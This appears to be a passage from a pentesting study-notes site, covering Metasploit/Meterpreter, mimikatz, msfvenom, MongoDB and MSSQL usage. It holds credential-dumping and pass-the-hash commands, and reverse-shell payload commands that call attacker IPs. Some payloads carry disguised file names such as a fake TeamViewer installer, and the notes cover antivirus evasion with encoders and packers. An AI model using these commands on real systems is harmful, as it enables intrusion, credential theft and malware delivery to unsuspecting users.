    ","tags":["pentesting"]},{"location":"metasploit/#meterpreter","title":"Meterpreter","text":"

    The Meterpreter payload is a specific type of multi-faceted payload that uses DLL injection to ensure the connection to the victim host is stable, hard to detect by simple checks, and persistent across reboots or system changes. Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques.

    When having an active session on the victim machine, the best module to run a Meterpreter is s4u_persistence:

    use exploit/windows/local/s4u_persistence\n\nshow options\n\nsessions\u00a0\n
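
A minimal sketch of running it against an existing Meterpreter session (session ID 1 is an assumption):

set SESSION 1\nexploit\n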
    ","tags":["pentesting"]},{"location":"metasploit/#meterpreter-commands","title":"meterpreter commands","text":"
# View all available commands\nhelp\n\n# Obtain a shell. Type exit to leave the shell\nshell\n\n# View information about the system\nsysinfo\n\n# View the id that meterpreter assigns to the machine\nmachine_id\n\n# Print the network configuration\nifconfig\n\n# Check routing information\nroute\n\n# Download a file\ndownload /path/to/fileofinterest.txt /path/to/ourmachine/destinationfile.txt\n\n# Upload a file\nupload /path/from/source.txt /path/to/destinationfile.txt\n\n# Bypass authentication. It takes you from a normal user to admin\ngetsystem\n# If the operation fails because of a priv_elevated_getsystem error message, then use the bypassuac module: use exploit/windows/local/bypassuac\n\n# View who you are\ngetuid  \n\n# View all running processes\nps\n\n# Steal the token of a different process with more privileges\nsteal_token <PID>\n\n# View the process that we are\ngetpid\n\n# Dump the contents of the SAM database\nhashdump\n\n# Dump the SAM database via LSA\nlsa_dump_sam\n\n# Meterpreter LSA Secrets Dump\nlsa_dump_secrets\n\n# Enumerate the modules available at this meterpreter session\nuse -l\n\n# Load a specific module\nuse <name of module>\n\n# View all processes run by the system. This allows us to choose one in order to migrate the process of our persistent connection to a less suspicious one.\nps -U SYSTEM\n\n# Change to a process\nmigrate <pid>\nmigrate -N lsass.exe\n# -N: Look for the lsass.exe process and migrate into it. We can do this to run the command hashdump (we'll get hashes to use with john the ripper or ophcrack). Also, we can choose a less suspicious process such as svchost.exe and migrate there.\n\n# Get a windows shell\nexecute -f cmd.exe -i -H\n\n# Display the host ARP cache\narp\n\n# Display the current proxy configuration\ngetproxy\n\n# Display interfaces\nifconfig\n\n# Display the network connections\nnetstat\n\n# Forward a local port to a remote service\nportfwd\n\n# Resolve a set of hostnames on the target\nresolve\n

    More commands

msf6> help\n    Command        Description\n    -------        -----------\n    enumdesktops   List all accessible desktops and window stations\n    getdesktop     Get the current meterpreter desktop\n    idletime       Returns the number of seconds the remote user has been idle\n    keyboard_send  Send keystrokes\n    keyevent       Send key events\n    keyscan_dump   Dump the keystroke buffer\n    keyscan_start  Start capturing keystrokes\n    keyscan_stop   Stop capturing keystrokes\n    mouse          Send mouse events\n    screenshare    Watch the remote user's desktop in real-time\n    screenshot     Grab a screenshot of the interactive desktop\n    setdesktop     Change the meterpreter's current desktop\n    uictl          Control some of the user interface components\n
    ","tags":["pentesting"]},{"location":"metasploit/#metasploit-modules","title":"metasploit modules","text":"

    Located at /usr/share/metasploit-framework/modules. They have the following structure:

    <No.> <type>/<os>/<service>/<name>\n794   exploit/windows/ftp/scriptftp_list\n

    If we do not want to use our web browser to search for a specific exploit within ExploitDB, we can use the CLI version, searchsploit.

    searchsploit nagios3\n

    How to download and install an exploit from exploitdb:

    # Search for it from website or using searchsploit and download it. It should have .rb extension\nsearchsploit nagios3\n\n# The default directory where all the modules, scripts, plugins, and `msfconsole` proprietary files are stored is `/usr/share/metasploit-framework`. The critical folders are also symlinked in our home and root folders in the hidden `~/.msf4/` location. \n# Make sure that our home folder .msf4 location has all the folder structure that the /usr/share/metasploit-framework/. If not, `mkdir` the appropriate folders so that the structure is the same as the original folder so that `msfconsole` can find the new modules.\n\n# After that, we will be proceeding with copying the .rb script directly into the primary location.\n
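
A sketch of those steps (the module file name and destination path are hypothetical; match the path to the module's type/os/service):

mkdir -p ~/.msf4/modules/exploits/unix/webapp\ncp nagios3_exploit.rb ~/.msf4/modules/exploits/unix/webapp/\nmsfconsole -q -x 'reload_all'\n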
    ","tags":["pentesting"]},{"location":"metasploit/#auxiliaryscannersmbsmb_login","title":"auxiliary/scanner/smb/smb_login","text":"

Use this module to enumerate users and brute-force passwords on an SMB service.
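
A minimal sketch (illustrative values; USER_FILE and PASS_FILE are standard options of this scanner):

use auxiliary/scanner/smb/smb_login\nset RHOSTS $ip\nset USER_FILE users.txt\nset PASS_FILE passwords.txt\nrun\n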

    ","tags":["pentesting"]},{"location":"metasploit/#auxiliaryhttp_javascript_keylogger","title":"auxiliary/http_javascript_keylogger","text":"

    It creates the Javascript payload with a keylogger, which could be injected within the XSS vulnerable web page and automatically starts the listening server. To see how it works, set the DEMO option to true.

    ","tags":["pentesting"]},{"location":"metasploit/#postwindowsgatherhasdump","title":"post/windows/gather/hasdump","text":"

    Once you have a meterpreter session as system user, this module dumps all passwords.

    ","tags":["pentesting"]},{"location":"metasploit/#windowsgatherarp-scanner","title":"windows/gather/arp-scanner","text":"

    To enumerate IPs in a network interface
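
An illustrative run (session ID and target range are assumptions):

use post/windows/gather/arp_scanner\nset SESSION 1\nset RHOSTS 10.10.10.0/24\nrun\n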

    ","tags":["pentesting"]},{"location":"metasploit/#windowsgathercredentialswindows_autologin","title":"windows/gather/credentials/windows_autologin","text":"

    This module extracts the plain-text Windows user login password in\u00a0 Registry. It exploits a Windows feature that Windows (2000 to 2008 R2) allows a user or third-party Windows Utility tools to configure User AutoLogin via plain-text password insertion in (Alt)DefaultPassword field in the registry location -\u00a0 HKLM\\Software\\Microsoft\\Windows NT\\WinLogon. This is readable by all\u00a0 users.

    ","tags":["pentesting"]},{"location":"metasploit/#postwindowsgatherwin_privs","title":"post/windows/gather/win_privs","text":"

    This module tells you the privileges you have on the exploited machine.\u00a0

    ","tags":["pentesting"]},{"location":"metasploit/#exploitwindowslocalbypassuac","title":"exploit/windows/local/bypassuac","text":"

If the getsystem command fails (in the meterpreter) because of a priv_elevated_getsystem error message, then use this module to bypass that restriction. You will get a new meterpreter session with the UAC policy disabled. Now you can run getsystem.

    ","tags":["pentesting"]},{"location":"metasploit/#postmultimanageshell_to_meterpretersessions","title":"post/multi/manage/shell_to_meterpretersessions","text":"

It upgrades your shell to a Meterpreter session.
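
A minimal sketch (shell session ID 1 assumed); the sessions -u shortcut achieves the same upgrade:

use post/multi/manage/shell_to_meterpreter\nset SESSION 1\nrun\n\n# Or, as a shortcut:\nsessions -u 1\n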

    ","tags":["pentesting"]},{"location":"metasploit/#postmultireconlocal_exploit_suggester","title":"post/multi/recon/local_exploit_suggester","text":"

    local exploit suggester module:

    post/multi/recon/local_exploit_suggester\n
    ","tags":["pentesting"]},{"location":"metasploit/#auxiliaryserversocks_proxy","title":"auxiliary/server/socks_proxy","text":"

    This module provides a SOCKS proxy server that uses the builtin Metasploit routing to relay connections.
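
An illustrative setup (port and SOCKS version are assumptions; afterwards, point your proxychains configuration at the chosen port):

use auxiliary/server/socks_proxy\nset SRVPORT 1080\nset VERSION 4a\nrun -j\n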

    ","tags":["pentesting"]},{"location":"metasploit/#exploitwindowsfileformatadobe_pdf_embedded_exe","title":"exploit/windows/fileformat/adobe_pdf_embedded_exe","text":"

See also exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs. These modules embed malware into an Adobe PDF.

    ","tags":["pentesting"]},{"location":"metasploit/#integration-of-metasploit-with-veil","title":"Integration of metasploit with veil","text":"

One nice thing about Veil is that it provides a Metasploit RC file, meaning that in order to launch the multi/handler you just need to run:

    msfconsole -r path/to/metasploitRCfile\n
    ","tags":["pentesting"]},{"location":"metasploit/#ipmi-information-discovery","title":"IPMI Information discovery","text":"

    See ipmi service on UDP/623. This module discovers host information through IPMI Channel Auth probes:

use auxiliary/scanner/ipmi/ipmi_version\n\nshow actions\n\nset ACTION <action-name>\n\nshow options\n# and set the needed options\n\nrun\n
    ","tags":["pentesting"]},{"location":"metasploit/#pmi-20-rakp-remote-sha1-password-hash-retrieval","title":"PMI 2.0 RAKP Remote SHA1 Password Hash Retrieval","text":"

This module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory, as well as with hashcat (CPU) 0.46 or newer using hash type 7300.

use auxiliary/scanner/ipmi/ipmi_dumphashes\n\nshow actions\n\nset ACTION <action-name>\n\nshow options\n# set <options>\n\nrun\n
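
The retrieved hashes can then be cracked with hashcat using mode 7300, as noted above (the hash file name is hypothetical):

hashcat -m 7300 ipmi_hashes.txt /usr/share/wordlists/rockyou.txt\n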
    ","tags":["pentesting"]},{"location":"metasploit/#the-http_javascript_keylogger","title":"The http_javascript_keylogger","text":"

This module runs a web server that demonstrates keystroke logging through JavaScript. The DEMO option can be set to enable a page that demonstrates this technique. To use this module with an existing web page, simply add a script source tag pointing to the URL of this service ending in the .js extension. For example, if URIPATH is set to "test", the following URL will load this script into the calling site: http://server:port/test/anything.js

    use auxiliary/server/capture/http_javascript_keylogger\n
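
Following the description above, an illustrative configuration:

set DEMO true\nset URIPATH test\nrun\n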
    ","tags":["pentesting"]},{"location":"mimikatz/","title":"mimikatz","text":"

mimikatz is a tool written in C.

It is now well known for extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory. mimikatz can also perform pass-the-hash and pass-the-ticket attacks or build Golden Tickets.

The Kiwi module, available in a Meterpreter session in Metasploit, is an adaptation of mimikatz.

    ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"mimikatz/#no-installation-portable","title":"No installation, portable","text":"

    Download from github repo: https://github.com/gentilkiwi/mimikatz.

    ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"mimikatz/#basic-usage","title":"Basic usage","text":"
# Impersonate NT Authority/SYSTEM (having permissions for it).\ntoken::elevate\n\n# List users and hashes of the machine\nlsadump::sam\n\n# Enable debug mode for our user\nprivilege::debug\n\n# List users logged in the machine and still in memory\nsekurlsa::logonPasswords full\n\n# Pass The Hash attack in windows:\n# 1. Run mimikatz\nmimikatz.exe privilege::debug \"sekurlsa::pth /user:<username> /rc4:<NTLM hash> /domain:<DOMAIN> /run:<Command>\" exit\n# sekurlsa::pth is a module that allows us to perform a Pass the Hash attack by starting a process using the hash of the user's password\n# /run:<Command>: For example /run:cmd.exe\n# 2. After that, we can use cmd.exe to execute commands in the user's context.\n
    ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"mitm-relay/","title":"mitm_relay","text":"

    Hackish way to intercept and modify non-HTTP protocols through Burp & others with support for SSL and STARTTLS interception

    This script is a very simple, quick and easy way to MiTM any arbitrary protocol through existing traffic interception software such as Burp Proxy or\u00a0Proxenet. It can be particularly useful for thick clients security assessments. It saves you from the pain of having to configure specific setup to intercept exotic protocols, or protocols that can't be easily intercepted. TCP and UDP are supported.

    It's \"hackish\" in the way that it was specifically designed to use interception and modification capabilities of existing proxies, but for arbitrary protocols. In order to achieve that, each client request and server response is wrapped into the body of a HTTP POST request, and sent to a local dummy \"echo-back\" web server via the proxy. Therefore, the HTTP responses or headers that you will see in your intercepting proxy are meaningless and can be disregarded. Yet the dummy web server is necessary in order for the interception tool to get the data back and feed it back to the tool.

    • The requests from client to server will appear as a request to a URL containing \"CLIENT_REQUEST\"
    • The responses from server to client will appear as a request to a URL containing \"SERVER_RESPONSE\"

    This way, it is completely asynchronous. Meaning that if the server sends responses in successive packets it won't be a problem.

To intercept only server responses, configure your interception rules accordingly (see the screenshots in the project README):

    \"Match and Replace\" rules can be used. However, using other Burp features such as repeater, intruder or scanner is pointless. That would only target the dummy webserver used to echo the data back.

The normal request traffic flow during typical usage is shown in the diagram in the project README.

    ","tags":["windows","thick applications"]},{"location":"mitm-relay/#installation","title":"Installation","text":"

    Download from GitHub - jrmdev/mitm_relay: Hackish way to intercept and modify non-HTTP protocols through Burp & others.

    ","tags":["windows","thick applications"]},{"location":"mitm-relay/#requirements","title":"Requirements","text":"

1. mitm_relay requires Python 3. To make sure it doesn't conflict with the pip module, we can use version 3.7.6. Download it from: https://www.python.org/ftp/python/3.7.6/python-3.7.6-amd64.exe and install it. Once installed, restart the system.

2. Also, we can run into problems such as missing modules. To get them installed, we would need to download getpip.py from https://github.com/amandaguglieri/python/blob/main/getpip.py

    After installing pip, to install a module, run:

    python -m pip install <nameofmodule>\n
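
A typical invocation might look like this (host names and ports are illustrative; verify the flags against the project README or mitm_relay.py -h, since they may change between versions):

python mitm_relay.py -l 0.0.0.0 -p 127.0.0.1:8080 -r tcp:1234:target.example:1234\n# -l: interface to listen on\n# -p: the intercepting proxy (e.g. Burp) as host:port\n# -r: relay definition in the form [tcp|udp:]lport:rhost:rport\n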
    ","tags":["windows","thick applications"]},{"location":"mmc-console/","title":"Microsoft Management Console (MMC)","text":"

    You use Microsoft Management Console (MMC) to create, save and open administrative tools, called consoles, which manage the hardware, software, and network components of your Microsoft Windows operating system.

    We can also open the MMC Console from a non-domain joined computer using the following command syntax:

    runas /netonly /user:Domain_Name\\Domain_USER mmc\n

    Now, you will have the MMC interface:

    We can add any of the RSAT snap-ins and enumerate the target domain in the context of the target user sally.jones in the freightlogistics.local domain. After adding the snap-ins, we will get an error message that the \"specified domain either does not exist or could not be contacted.\" From here, we have to right-click on the Active Directory Users and Computers snap-in (or any other chosen snap-in) and choose Change Domain.

    Type the target domain into the Change domain dialogue box, here freightlogistics.local. From here, we can now freely enumerate the domain using any of the AD RSAT snapins.

    ","tags":["active directory","ldap","windows"]},{"location":"mobsf/","title":"Mobile Security Framework - MobSF","text":"

Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF supports mobile app binaries (APK, XAPK, IPA & APPX) along with other formats.

    ","tags":["mobile pentesting"]},{"location":"mobsf/#installation","title":"Installation","text":"
1. Install Git using the command provided below in a terminal:
    sudo apt-get install git\n
2. Install Python 3.8/3.9 using the command provided below:
sudo apt-get install python3.8\n
3. Install the latest version of the JDK.

    Download from: https://www.oracle.com/java/technologies/javase-java-archive-javase6-downloads.html

    Then:

    chmod +x jdk-6u45-linux-x64.bin\nsh jdk-6u45-linux-x64.bin      \n

4. Install the required dependencies using the command provided below:
    sudo apt install python3-dev python3-venv python3-pip build-essential libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg62-turbo-dev zlib1g-dev wkhtmltopdf\n
5. Download MobSF using the command provided below:
    git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git\n

    Setup MobSF using command:

    sudo ./setup.sh\n

    Run!

./run.sh 127.0.0.1:8000\n\n# Note: we can use any port number instead of 8000, but it must be available\n

    Access the MobSF web interface in browser using the URL: http://127.0.0.1:8000

    ","tags":["mobile pentesting"]},{"location":"mongo/","title":"Mongo","text":"

    By default, mongo uses TCP ports 27017-27018.

    ","tags":["database","database","NoSQL"]},{"location":"mongo/#to-connect-to-a-mongodb","title":"To connect to a MongoDB","text":"

By default, mongo does not require a password. admin is a common default admin user in mongo databases.

    mongo $ip\nmongo <HOST>:<PORT>\nmongo <HOST>:<PORT>/<DB>\nmongo <database> -u <username> -p '<password>'\n

    A collection is a group of documents in the database.

    ","tags":["database","database","NoSQL"]},{"location":"mongo/#basic-usage","title":"Basic usage","text":"
# Enter the mongodb application\nmongo\n\n# See help\nhelp\n\n# Display databases\nshow dbs\n\n# Select a database\nuse <db>\n\n# Display collections in a database\nshow collections\n\n# Dump a collection\ndb.<collection>.find()\n\n# Return the number of records of the collection\ndb.<collection>.count()\n\n# Find in the current db the username admin\ndb.current.find({\"username\":\"admin\"})\n\n# Find in the city collection all cities that match the criteria (= MA) and return the count\ndb.city.find({\"city\":\"MA\"}).count()\n\n# How many cities of state \"Indiana\" have a population greater than 15000 in collection \"city\" in database \"city\"?\ndb.city.find({$and:[{\"state\":\"IN\"}, {\"pop\":{$gt:15000}}]}).count()\n\n\n####################\n# Operators\n####################\n# Greater than: $gt\ndb.city.find({\"population\":{$gt:150000}}).count()\n\n# And operator: $and\ndb.city.find({$and:[{population:{$gt:150000}},{\"state\":\"FLORIDA\"}]})\n\n# Or operator: $or\ndb.city.find({$or:[{population:{$lt:1000}},{\"state\":\"FLORIDA\"}]})\n\n# Not equal operator: $ne\n# Equal operator: $eq\n\n# Additionally, you can use regex. Cities that start with HA:\ndb.city.find({\"city\":{$regex:\"^HA.*\"}})\n\n# What is the name of the 101st city in collection \"city\" when sorted in ascending order according to \"city\" in database \"city\"?\ndb.city.find().sort({\"city\":1}).skip(100).limit(1)\n\n#####################\n# Operations\n#####################\n# Perform an average on an aggregate of documents\ndb.city.aggregate({\"$group\":{\"_id\":null, avg:{$avg:\"$population\"}}})\n\n\n# We can dump the contents of the documents present in the flag collection by using the db.collection.find() command. Let's replace the collection name flag in the command and also use pretty() in order to receive the output in a beautified format.\n
    ","tags":["database","database","NoSQL"]},{"location":"moodlescan/","title":"moodlescan","text":"

My eval: I'm not sure about how accurate it is. I was working on the Goldeneye1 machine from VulnHub and moodlescan identified the Moodle version as 2.2.2 when in reality it is 2.2.3.

    ","tags":["pentesting","web pentesting","cms","moodle"]},{"location":"moodlescan/#installation","title":"Installation","text":"

Requirements: install Python 3 and the package python3-pip.

    git clone https://github.com/inc0d3/moodlescan\ncd moodlescan\npip install -r requirements.txt\n
    ","tags":["pentesting","web pentesting","cms","moodle"]},{"location":"moodlescan/#basic-commands","title":"Basic commands","text":"
python moodlescan.py -u [URL]\n\n\n# Options\n#       -u [URL]    : URL with the target, the moodle to scan\n#       -a      : Update the database of vulnerabilities to the latest version\n#       -r      : Enable HTTP requests with a random user-agent\n#       -k      : Ignore SSL certificate\n#       Proxy configuration\n#\n#       -p [URL]    : URL of the proxy server (http)\n#       -b [user]   : User to authenticate to the proxy server\n#       -c [password]   : Password to authenticate to the proxy server\n#       -d [protocol]  : Protocol of authentication: basic or ntlm\n
    ","tags":["pentesting","web pentesting","cms","moodle"]},{"location":"msfvenom/","title":"msfvenom","text":"

    MSFVenom is the successor of MSFPayload and MSFEncode, two stand-alone scripts that used to work in conjunction with msfconsole to provide users with highly customizable and hard-to-detect payloads for their exploits.

    You can generate a webshell by using\u00a0 msfvenom

    # List payloads\nmsfvenom --list payloads | grep x64 | grep linux | grep reverse\u00a0\u00a0\n\n# list all the available payloads\nmsfvenom -l payloads  \n

    Also msfvenom can use metasploit payloads under \u201ccmd/unix\u201d to generate one-liner bind or reverse shells. List options with:

    msfvenom -l payloads | grep \"cmd/unix\" | awk '{print $1}'\n
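
For instance, to generate a Bash reverse shell one-liner (IP and port are illustrative):

msfvenom -p cmd/unix/reverse_bash lhost=10.10.14.2 lport=4444 -f raw\n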
    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#some-flags","title":"Some flags","text":"
    # -b, or --bad-chars: The list of characters to avoid example: '0'\n
    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#staged-payload","title":"Staged payload","text":"
    # Example of a linux staged payload\nmsfvenom -p linux/x64/shell/reverse_tcp lhost=192.66.166.2 lport=443 -f elf -o newfile\n\n# Example of a windows staged payload\nmsfvenom -p windows/x64/meterpreter/bind_tcp lhost=10.10.14.72 lport=1234 -f aspx -o lal\n

    After that

    chmod +x newfile\u00a0\n

When creating a staged payload, you will need to use a Metasploit handler (exploit/multi/handler) in order to receive the shell connection, as only Metasploit contains the logic that sends the rest of the payload to the connecting host. In that case, the Metasploit payload has to be the same one as the MSFVenom payload.
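
A handler sketch matching the Linux staged example above:

use exploit/multi/handler\nset payload linux/x64/shell/reverse_tcp\nset LHOST 192.66.166.2\nset LPORT 443\nrun\n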

    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#stagedless-payload","title":"Stagedless payload","text":"

A stageless payload is a standalone program that does not need anything additional (no Metasploit connection), just a netcat listener on the attacker's computer.

    # Example of a windows stageless payload\nmsfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe\n
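
On our machine, the matching listener for the example above:

sudo nc -lvnp 443\n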

If the AV is disabled, all the user would need to do is double-click the file to execute it, and we would have a shell session.

    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#crafting-a-dll-file-with-a-webshell","title":"crafting a DLL file with a webshell","text":"

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IPAttacker> LPORT=<4444> -a x86 -f dll > SECUR32.dll\n# -p: for the chosen payload\n# -a: architecture in the victim machine/application\n# -f: format for the output file\n
More about DLL hijacking in thick client applications.

    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#crafting-a-exe-file-with-shikata-ga-nai-encoder","title":"crafting a .exe file with Shikata Ga Nai encoder","text":"
    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -e x86/shikata_ga_nai -f exe -o ./TeamViewerInstall.exe\n\n# -e: chosen encoder \n

The Shikata Ga Nai encoder will most likely be detected by AV and IDS/IPS. A better option would be to run it through multiple iterations of the same encoding scheme:

    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe\n

    But, still, we could be getting detected.

    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#module-msf-virustotal","title":"Module msf-virustotal","text":"

    Alternatively, Metasploit offers a tool called msf-virustotal that we can use with an API key to analyze our payloads. However, this requires free registration on VirusTotal.

    msf-virustotal -k <API key> -f TeamViewerInstall.exe\n
    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#packers","title":"Packers","text":"

    The term Packer refers to the result of an executable compression process where the payload is packed together with an executable program and with the decompression code in one single file. When run, the decompression code returns the backdoored executable to its original state, allowing for yet another layer of protection against file scanning mechanisms on target hosts. This process takes place transparently for the compressed executable to be run the same way as the original executable while retaining all of the original functionality. In addition, msfvenom provides the ability to compress and change the file structure of a backdoored executable and encrypt the underlying process structure.

    A list of popular packer software:

• UPX packer
• The Enigma Protector
• MPRESS
• Alternate EXE Packer
• ExeStealth
• Morphine
• MEW
• Themida

    If we want to learn more about packers, please check out the PolyPack project.
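
As an illustration, compressing the payload from the earlier examples with UPX (assuming upx is installed; the output file name is arbitrary):

upx -9 -o TeamViewerInstall_packed.exe TeamViewerInstall.exe\n# -9: best compression\n# -o: name of the packed output file\n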

    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#mitical-attacks","title":"Mitical attacks","text":"Vulnerability Description MS08-067 MS08-067 was a critical patch pushed out to many different Windows revisions due to an SMB flaw. This flaw made it extremely easy to infiltrate a Windows host. It was so efficient that the Conficker worm was using it to infect every vulnerable host it came across. Even Stuxnet took advantage of this vulnerability. Eternal Blue MS17-010 is an exploit leaked in the Shadow Brokers dump from the NSA. This exploit was most notably used in the WannaCry ransomware and NotPetya cyber attacks. This attack took advantage of a flaw in the SMB v1 protocol allowing for code execution. EternalBlue is believed to have infected upwards of 200,000 hosts just in 2017 and is still a common way to find access into a vulnerable Windows host. PrintNightmare A remote code execution vulnerability in the Windows Print Spooler. With valid credentials for that host or a low privilege shell, you can install a printer, add a driver that runs for you, and grants you system-level access to the host. This vulnerability has been ravaging companies through 2021. 0xdf wrote an awesome post on it here. BlueKeep CVE 2019-0708 is a vulnerability in Microsoft's RDP protocol that allows for Remote Code Execution. This vulnerability took advantage of a miss-called channel to gain code execution, affecting every Windows revision from Windows 2000 to Server 2008 R2. Sigred CVE 2020-1350 utilized a flaw in how DNS reads SIG resource records. It is a bit more complicated than the other exploits on this list, but if done correctly, it will give the attacker Domain Admin privileges since it will affect the domain's DNS server which is commonly the primary Domain Controller. SeriousSam CVE 2021-36924 exploits an issue with the way Windows handles permission on the C:\\Windows\\system32\\config folder. Before fixing the issue, non-elevated users have access to the SAM database, among other files. This is not a huge issue since the files can't be accessed while in use by the pc, but this gets dangerous when looking at volume shadow copy backups. These same privilege mistakes exist on the backup files as well, allowing an attacker to read the SAM database, dumping credentials. Zerologon CVE 2020-1472 is a critical vulnerability that exploits a cryptographic flaw in Microsoft\u2019s Active Directory Netlogon Remote Protocol (MS-NRPC). It allows users to log on to servers using NT LAN Manager (NTLM) and even send account changes via the protocol. The attack can be a bit complex, but it is trivial to execute since an attacker would have to make around 256 guesses at a computer account password before finding what they need. This can happen in a matter of a few seconds.","tags":["pentesting","terminal","shells"]},{"location":"mssql/","title":"MSSQL - Microsoft SQL Server","text":"

    Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications\u2014which may run either on the same computer or on another computer across a network. Wikipedia.

    By default, MSSQL uses ports\u00a0TCP/1433\u00a0and\u00a0UDP/1434. \u00a0However, when MSSQL operates in a \"hidden\" mode, it uses the\u00a0TCP/2433\u00a0port.

    ","tags":["database","cheat sheet"]},{"location":"mssql/#mssql-databases","title":"MSSQL Databases","text":"

    MSSQL has default system databases that can help us understand the structure of all the databases that may be hosted on a target server.

| Default System Database | Description |
| --- | --- |
| master | Tracks all system information for an SQL Server instance |
| model | Template database that acts as a structure for every new database created. Any setting changed in the model database will be reflected in any new database created afterwards |
| msdb | The SQL Server Agent uses this database to schedule jobs & alerts |
| tempdb | Stores temporary objects |
| resource | Read-only database containing system objects included with SQL Server |

    Table source: System Databases Microsoft Doc and HTB Academy

    ","tags":["database","cheat sheet"]},{"location":"mssql/#authentication-mechanisms","title":"Authentication Mechanisms","text":"

    MSSQL supports two authentication modes, which means that users can be created in Windows or the SQL Server:

    • Windows authentication mode: This is the default, often referred to as integrated security because the SQL Server security model is tightly integrated with Windows/Active Directory. Specific Windows user and group accounts are trusted to log in to SQL Server. Windows users who have already been authenticated do not have to present additional credentials.
    • Mixed mode: Mixed mode supports authentication by Windows/Active Directory accounts and SQL Server. Username and password pairs are maintained within SQL Server.
    ","tags":["database","cheat sheet"]},{"location":"mssql/#mssql-clients","title":"MSSQL Clients","text":"
    • SQL Server Management Studio (SSMS) comes as a feature that can be installed with the MSSQL install package or can be downloaded & installed separately
    • mssql-cli
    • SQL Server PowerShell|
• HeidiSQL
• SQLPro
• Impacket's mssqlclient.py. To locate it:
    locate mssqlclient\n

    Of the MSSQL clients listed above, pentesters may find Impacket's mssqlclient.py to be the most useful due to SecureAuthCorp's Impacket project being present on many pentesting distributions at install.

    ","tags":["database","cheat sheet"]},{"location":"mssql/#database-configuration","title":"Database configuration","text":"

    When an admin initially installs and configures MSSQL to be network accessible, the SQL service will likely run as NT SERVICE\\MSSQLSERVER. Connecting from the client-side is possible through Windows Authentication, and by default, encryption is not enforced when attempting to connect.

    Authentication being set to Windows Authentication means that the underlying Windows OS will process the login request and use either the local SAM database or the domain controller (hosting Active Directory) before allowing connectivity to the database management system.

Misconfigurations to look at (a quick check with nmap is sketched after the list):

• MSSQL clients not using encryption to connect to the MSSQL server.
• The use of self-signed certificates when encryption is being used. It is possible to spoof self-signed certificates.
• The use of named pipes.
• Weak & default sa credentials. Admins may forget to disable this account.
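Some of these settings can be footprinted with nmap's ms-sql-* NSE scripts (a sketch; script availability depends on your nmap install):

sudo nmap -p 1433 --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password $ip\n# ms-sql-info: version, instance name and named-pipe information\n# ms-sql-ntlm-info: Windows/domain information leaked via NTLM\n# ms-sql-empty-password: checks for a blank sa password\n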
    ","tags":["database","cheat sheet"]},{"location":"mssql/#interact-with-mssql","title":"Interact with MSSQL","text":"","tags":["database","cheat sheet"]},{"location":"mssql/#from-linux","title":"From Linux","text":"

    sqsh

     sqsh -S $IP -U username -P Password123 -h\n # -h: disable headers and footers for a cleaner look.\n\n# When using Windows Authentication, we need to specify the domain name or the hostname of the target machine. If we don't specify a domain or hostname, it will assume SQL Authentication.\nsqsh -S $ip -U .\\\\<username> -P 'MyPassword!' -h\n# For windows authentication we can use  SERVERNAME\\\\accountname or .\\\\accountname\n
    ","tags":["database","cheat sheet"]},{"location":"mssql/#from-windows","title":"From Windows","text":"

    sqlcmd

    The\u00a0sqlcmd\u00a0utility lets you enter Transact-SQL statements, system procedures, and script files through a variety of available modes:

    • At the command prompt.
    • In Query Editor in SQLCMD mode.
    • In a Windows script file.
    • In an operating system (Cmd.exe) job step of a SQL Server Agent job.

Careful: in some environments the batch terminator GO needs to be written in lowercase (go).

    sqlcmd -S $IP -U username -P Password123\n\n\n# We need to use GO after our query to execute the SQL syntax. \n# List databases\nSELECT name FROM master.dbo.sysdatabases\ngo\n\n# Use a database\nUSE dbName\ngo\n\n# Show tables\nSELECT table_name FROM dbName.INFORMATION_SCHEMA.TABLES\ngo\n\n# Select all Data from Table \"users\"\nSELECT * FROM users\ngo\n
    ","tags":["database","cheat sheet"]},{"location":"mssql/#gui-application","title":"GUI Application","text":"

    mssql-cli, mssqlclient.py, dbeaver

    ","tags":["database","cheat sheet"]},{"location":"mssql/#sql-server-management-studio-or-ssms","title":"SQL Server Management Studio or SSMS","text":"

Windows only. Download, install, and connect to the database.

    ","tags":["database","cheat sheet"]},{"location":"mssql/#dbeaver","title":"dbeaver","text":"

    dbeaver is a multi-platform database tool for Linux, macOS, and Windows that supports connecting to multiple database engines such as MSSQL, MySQL, PostgreSQL, among others, making it easy for us, as an attacker, to interact with common database servers.

    ","tags":["database","cheat sheet"]},{"location":"mssql/#mssqlclientpy","title":"mssqlclient.py","text":"

    Alternatively, we can use the tool from Impacket with the name\u00a0mssqlclient.py.

    mssqlclient.py -p 1433 <username>@$ip \n
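If the target uses Windows Authentication, mssqlclient.py also accepts the -windows-auth flag (target format follows Impacket's [[domain/]username[:password]@]host convention):

mssqlclient.py <domain>/<username>:<password>@$ip -windows-auth\n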
    ","tags":["database","cheat sheet"]},{"location":"mssql/#basic-commands","title":"Basic commands","text":"
